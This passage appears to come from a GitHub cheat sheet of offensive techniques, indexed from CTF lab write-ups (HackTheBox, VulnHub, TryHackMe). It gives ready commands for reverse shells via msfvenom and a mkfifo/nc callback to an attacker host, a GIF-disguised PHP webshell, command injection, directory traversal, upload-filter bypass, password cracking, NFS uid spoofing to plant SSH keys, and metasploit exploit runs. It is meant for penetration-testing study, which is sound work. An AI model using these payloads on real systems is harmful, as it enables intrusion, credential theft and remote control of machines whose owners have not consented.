obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp nc -nlvp <attackerport> http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm # set url to revshell.jsp link # mark the save output to file option # set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp # run the scheduled task on demand to upload the revshell.jsp file http://<targetip>:<targetport>/CFIDE/revshell.jsp ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="exploit_command_injection"></a> #### exploit_command_injection [⇡](#exploit) certain webapps couldbe vulebrable to command injection via input text fields ```shell # submit escaped input: "\";whoami\n" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="exploit_credsreuse"></a> #### exploit_credsreuse [⇡](#exploit) Reuse credentials already found for a service to interact with another service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="exploit_defaultcreds"></a> #### exploit_defaultcreds [⇡](#exploit) Use default credentials to interact with a service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_drupal_passwordcrack"></a> #### exploit_drupal_passwordcrack [⇡](#exploit) Crack a drupal password hash ```shell hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force ``` [+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html --- <a name="exploit_ftp_anonymous"></a> #### exploit_ftp_anonymous [⇡](#exploit) Interact with the ftp service using `anonymous/any` credentials | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_ftp_web_root"></a> #### exploit_ftp_web_root [⇡](#exploit) FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_gpp_groupsxml"></a> #### exploit_gpp_groupsxml [⇡](#exploit) the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method ```shell smbclient //10.10.10.100/Replication get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml exit cat Groups.xml gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" smbclient //10.10.10.100/Users -U SVC_TGS ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://adsecurity.org/?p=2288 --- <a name="exploit_gymsystem_rce"></a> #### exploit_gymsystem_rce [⇡](#exploit) use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can ```shell python 48506.py http://<targetip>:<targetport>/ curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48506 --- <a name="exploit_hfs_cmd_exec"></a> #### exploit_hfs_cmd_exec [⇡](#exploit) HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution ```shell python 39161.py <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | [+] https://www.exploit-db.com/exploits/39161 [+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287 --- <a name="exploit_iis_asp_reverseshell"></a> #### exploit_iis_asp_reverseshell [⇡](#exploit) use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg) ```shell msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells --- <a name="exploit_iis_webdav"></a> #### exploit_iis_webdav [⇡](#exploit) multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system ```shell msfconsole use windows/iis/iis_webdav_scstoragepathfromurl set rhost <targetip> set rport <targetport> show options exploit use windows/iis/iis_webdav_upload_asp set rhost <targetip> set rport <targetport> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp --- <a name="exploit_lotuscms"></a> #### exploit_lotuscms [⇡](#exploit) LotusCMS is vulnerable to remote code execution ```shell nc -nlvp <attackerport> ./lotusRCE.sh <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | [+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh --- <a name="exploit_modssl"></a> #### exploit_modssl [⇡](#exploit) Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution ```shell gcc -o 47080 47080.c -lcrypto ./47080 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 ./47080 0x6b <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | [+] https://www.exploit-db.com/exploits/47080 [+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082 --- <a name="exploit_mongodb"></a> #### exploit_mongodb [⇡](#exploit) ```shell nc -nlvp <attackerport> mongo -p -u <user> <record> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"}) bye ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nfs_rw"></a> #### exploit_nfs_rw [⇡](#exploit) when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system ```shell check available mountpoints mount file system via nfs v3 check uid of user create a new local user with nfs user's uid change to new user copy ssh public key to .ssh/authorized_keys file ssh into the target as user copy root owned copy of bash from local system to nfs mount running "./bash -p" gives root access as euid is carried over during copy operation mount nfsv3, create new user with nfs user uid and get root shell unmount and remove temporary user: showmount -e <targetip> mkdir /tmp/nfs mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files ls -l /tmp/nfs # check the uid and use it to create new user useradd -u 2008 vulnix su vulnix copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access umount /tmp/nfs ; userdel vulnix showmount -e <targetip> Export list for <targetip>: /home/vulnix * mkdir ./mnt/ mount <targetip>:/home/vulnix ./mnt -o vers=3 ls -l groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix cp ~/.ssh/id_rsa.pub ./authorized_keys su vulnix cd ./mnt/ mkdir .ssh/ cp ./authorized_keys ./.ssh/ exit ssh vulnix@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | [+] https://blog.christophetd.fr/write-up-vulnix/ --- <a name="exploit_nodejs"></a> #### exploit_nodejs [⇡](#exploit) inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nodejs_deserialize"></a> #### exploit_nodejs_deserialize [⇡](#exploit) user input is passed to `unserialize()` method that could allow remote code execution [+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/ [+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py [+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py [+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html --- <a name="exploit_pchart"></a> #### exploit_pchart [⇡](#exploit) the `pChart 2.1.3` web application is vulnerable to directory traversal ```shell http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/31173 [+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb --- <a name="exploit_pfsense"></a> #### exploit_pfsense [⇡](#exploit) pfsense 2.1.3 is vulnerable to command injection ```shell python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar ``` [+] https://www.exploit-db.com/exploits/43560 [+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190 --- <a name="exploit_php_acs_rfi"></a> #### exploit_php_acs_rfi [⇡](#exploit) Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks ```shell curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>" ``` [+] https://www.exploit-db.com/exploits/9623 --- <a name="exploit_php_fileupload"></a> #### exploit_php_fileupload [⇡](#exploit) certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php subl rs.php # point to <attackerip> and <attackerport> nc -nlvp <attackerport> # upload rs.php and trigger execution ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_fileupload_bypass"></a> #### exploit_php_fileupload_bypass [⇡](#exploit) add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file nc -nlvp <attackerport> # upload rs.php.gif and trigger execution ### echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif # upload and execute commands ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_reverseshell"></a> #### exploit_php_reverseshell [⇡](#exploit) use php reverse shell code with an exploit to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img 